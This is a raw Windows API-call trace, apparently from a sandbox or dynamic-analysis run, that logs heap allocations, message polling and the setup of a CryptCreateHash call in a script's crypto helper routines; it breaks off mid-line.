PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.811] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.811] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.811] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0243.811] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.811] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0243.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.811] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.850] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.851] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.851] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0243.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.851] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0243.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0243.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0243.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e513b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0243.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.852] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0243.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0243.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0243.853] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0243.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0243.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0243.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0243.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0243.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0243.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0243.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0243.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0243.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ed8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0243.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.860] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, 